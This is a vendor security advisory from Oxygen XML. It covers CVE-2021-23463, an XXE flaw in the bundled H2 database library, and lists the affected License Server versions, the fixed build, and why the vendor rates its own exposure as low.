CVE-2021-23463 - XML External Entity (XXE) Injection
Severity: Low2022-02-08
Abstract
The package com.h2database:h2 from 1.4.198 and before 2.0.202 are vulnerable to XML External Entity (XXE) Injection via the org.h2.jdbc.JdbcSQLXML class object, when it receives parsed string data from org.h2.jdbc.JdbcResultSet.getSQLXML() method. If it executes the getSource() method when the parameter is DOMSource.class it will trigger the vulnerability.
The Oxygen License Server product incorporates com.h2database:h2 as a third-party library. This advisory was opened to address the potential impact of this third-party library vulnerability.
Affected Products/Versions
Product | Severity | Fixed Release Availability |
Oxygen License server v24.0 and older | Low | Oxygen License Server 24.0 build 2022020113 |
Detail
CVE-2021-23463
Severity: Critical
CVSS Score: 9.1
The com.h2database:h2 third-party library used by Oxygen XML products is an affected version mentioned in CVE-2021-23463 vulnerability description. However, this library is not used to parse XML data from untrusted sources. For that reason, we have rated the severity level for our products as low.